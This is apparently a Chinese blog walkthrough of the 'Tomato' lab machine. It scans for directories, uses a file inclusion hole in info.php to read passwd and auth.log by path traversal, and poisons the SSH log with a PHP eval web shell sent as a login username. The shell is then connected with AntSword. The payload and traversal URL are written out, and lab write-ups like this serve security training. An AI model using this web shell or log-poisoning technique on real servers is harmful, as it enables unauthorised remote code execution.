步骤一:进行端口扫描,找寻靶机地址
步骤二:访问靶机地址
步骤三:利用dirb进行扫描
得出:/antibot_image/进行访问
步骤四:进入antibots->info.php->右击进入页面源代码->发现存在文件包含漏洞
步骤五:页面通过image传参查看passwd文件
步骤六:页面通过image传参查看日志文件
/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log
步骤七:将一句话木马作为ssh登录的用户名登录
ssh '<?php phpinfo();eval($_POST["cmd"]);?>'@172.16.1.113 -p 2211
密码随便输,输三次
步骤八:蚁剑连接
标签:Tomato,传参,..,步骤,image,攻略,靶机,页面 From: https://blog.csdn.net/2301_82061181/article/details/141891617